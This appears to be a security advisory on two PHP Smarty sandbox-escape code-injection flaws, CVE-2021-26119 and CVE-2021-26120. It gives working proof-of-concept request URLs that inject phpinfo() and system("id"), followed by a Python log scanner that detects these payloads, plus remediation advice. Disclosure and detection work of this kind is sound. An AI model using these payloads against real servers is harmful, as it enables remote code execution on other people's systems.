PHP Smarty Template Code Injection Vulnerabilities (CVE-2021-26120)

Published 2021-02-26

0x00 Vulnerability Overview

CVE ID: CVE-2021-26120

Date: 2021-02-26

Type: Code injection

Severity: High

Remotely exploitable: Yes

Affected versions: PHP Smarty < 3.1.39

 

0x01 Vulnerability Details

 

Smarty is a template engine written in PHP. It separates PHP logic from presentation (the HTML pages) so that the two can be maintained independently.

Two PHP code injection vulnerabilities in PHP Smarty (CVE-2021-26120 and CVE-2021-26119) were recently disclosed. Both are escapes from Smarty's template sandbox: an attacker who controls template source can use them to inject and execute arbitrary PHP code.

template_object sandbox escape, PHP code injection (CVE-2021-26119)

In Smarty, a template can reach the current template object through the $smarty.template_object variable. Because the attacker can then read its smarty or parent property, they obtain the Smarty instance itself, and with it internal helper classes that the sandbox was meant to keep out of reach. An attacker who exploits this with crafted template data can ultimately achieve remote code execution.

The PoC is shown below. It must be requested twice: the first request writes the template's compiled file and then overwrites it with the injected PHP; the second request loads (includes) that compiled file, executing the payload.

http://localhost:8000/page.php?poc=string:{$s=$smarty.template_object->smarty}{$fp=$smarty.template_object->compiled->filepath}{Smarty_Internal_Runtime_WriteFile::writeFile($fp,"<?php+phpinfo();",$s)}


 

Smarty_Internal_Runtime_TplFunction sandbox escape, PHP code injection (CVE-2021-26120)

When Smarty compiles template syntax, the Smarty_Internal_Runtime_TplFunction class does not properly validate the name attribute of a {function} block when registering tplFunctions. The value of name is copied into the generated PHP source, so a name containing PHP syntax (as in the PoC below: a closing parenthesis and brace, a system() call, and the start of a new function) closes the generated function definition and runs attacker-controlled code, giving remote code execution.

The PoC is as follows:

http://localhost:8000/page.php?poc=string:{function+name='rce(){};system("id");function+'}{/function}

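Both PoCs above arrive as a single request whose parameter is handed to Smarty as a template, so their shapes are easy to hunt for in web-server logs. The following is an added detection example, not code from this advisory or from the Smarty project: it parses combined-format access-log lines, URL-decodes each query parameter (repeatedly, to catch double-encoded payloads), and flags any value that references $smarty.template_object (CVE-2021-26119) or defines a {function} whose name is not a plain identifier (CVE-2021-26120). The log lines, the client addresses and the page.php?poc= endpoint are constructed to match the PoC URLs; adjust LOG_RE for your own log format.

```python
"""Flag requests carrying the Smarty sandbox-escape payload shapes from
CVE-2021-26119 and CVE-2021-26120 in a combined-format access log.
Added example, not part of the advisory or of Smarty itself. Assumes the
application passes a GET parameter to Smarty as a template (page.php?poc=...),
as the PoC URLs imply; all log lines below are constructed."""
import re
from urllib.parse import quote_plus, unquote_plus, urlsplit

# Apache/Nginx "combined" format: ip ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# CVE-2021-26119: a user-supplied template has no legitimate reason to touch
# $smarty.template_object; any reference to it is a sandbox probe.
TEMPLATE_OBJECT_RE = re.compile(r"\$smarty\.template_object", re.IGNORECASE)

# CVE-2021-26120: {function name='...'} whose name is not a bare identifier.
# The name is copied into generated PHP, so quotes, parentheses, braces or
# semicolons inside it close the generated function and start injected code.
TPLFUNCTION_RE = re.compile(
    r"\{\s*function\b[^}]*?\bname\s*=\s*(['\"])(?P<name>.*?)\1",
    re.IGNORECASE | re.DOTALL,
)
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def classify(template_source):
    """Return the sorted CVE ids whose exploitation signature appears in one template string."""
    hits = set()
    if TEMPLATE_OBJECT_RE.search(template_source):
        hits.add("CVE-2021-26119")
    for match in TPLFUNCTION_RE.finditer(template_source):
        if not IDENTIFIER_RE.match(match.group("name")):
            hits.add("CVE-2021-26120")
    return sorted(hits)


def decode_params(target, max_rounds=3):
    """Split the query string and URL-decode every value a bounded number of
    times, so a double-encoded payload (%2524smarty...) is seen in final form.
    Splits on '&' only, because the payloads themselves contain ';'."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        key, _sep, value = pair.partition("=")
        for _round in range(max_rounds):
            decoded = unquote_plus(value)
            if decoded == value:
                break
            value = decoded
        params[unquote_plus(key)] = value
    return params


def scan_log(log_text):
    """Return (ip, target, cves) for each request whose parameters match a signature."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        params = decode_params(match.group("target"))
        cves = sorted({cve for value in params.values() for cve in classify(value)})
        if cves:
            findings.append((match.group("ip"), match.group("target"), cves))
    return findings


# The advisory's two PoC templates, with the URL's '+' rendered as spaces.
POC_26119 = (
    "string:{$s=$smarty.template_object->smarty}"
    "{$fp=$smarty.template_object->compiled->filepath}"
    '{Smarty_Internal_Runtime_WriteFile::writeFile($fp,"<?php phpinfo();",$s)}'
)
POC_26120 = "string:{function name='rce(){};system(\"id\");function '}{/function}"
BENIGN = "string:Hello {$name}"


def _line(ip, encoded_value):
    """Build one constructed combined-format log line for page.php?poc=<value>."""
    return f'{ip} - - [18/Feb/2021:10:01:02 +0000] "GET /page.php?poc={encoded_value} HTTP/1.1" 200 512'


# Constructed sample log: two PoC requests, one benign request, one double-encoded PoC.
SAMPLE_LOG = "\n".join([
    _line("203.0.113.7", quote_plus(POC_26119)),
    _line("198.51.100.4", quote_plus(BENIGN)),
    _line("203.0.113.7", quote_plus(POC_26120)),
    _line("203.0.113.9", quote_plus(quote_plus(POC_26120))),  # double-encoded evasion
])

if __name__ == "__main__":
    for ip, target, cves in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(cves), target[:60] + "...")
```

The identifier check is deliberately strict: a legitimate `{function name='menu'}` passes, while anything that could break out of the generated PHP is reported, which is the same property the 3.1.39 fix enforces at compile time. Run this against the raw request line (not a pre-decoded field) so the decoding loop, not the log pipeline, decides what the payload looked like.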

 

0x02 Remediation

The vulnerabilities are fixed in Smarty 3.1.39. Update to 3.1.39 or a later version as soon as possible. Independently of the fix, do not pass request-controlled data to Smarty as template source (for example a string: resource built from a query parameter, as in the PoCs); untrusted input belongs in template variables, not in the template itself, because the sandbox has repeatedly proven bypassable.

Release notes:

https://github.com/smarty-php/smarty/blob/master/CHANGELOG.md

 

0x03 References

https://github.com/smarty-php/smarty/security/advisories/GHSA-w5hr-jm4j-9jvq

https://github.com/smarty-php/smarty/security/advisories/GHSA-3rpf-5rqv-689q

https://srcincite.io/blog/2021/02/18/smarty-template-engine-multiple-sandbox-escape-vulnerabilities.html

 

0x04 Timeline

2021-02-18  Steven Seeley publicly discloses the vulnerabilities

2021-02-26  VSRC publishes this security advisory

 

0x05 Appendix

CVSS scoring standard (official site): http://www.first.org/cvss/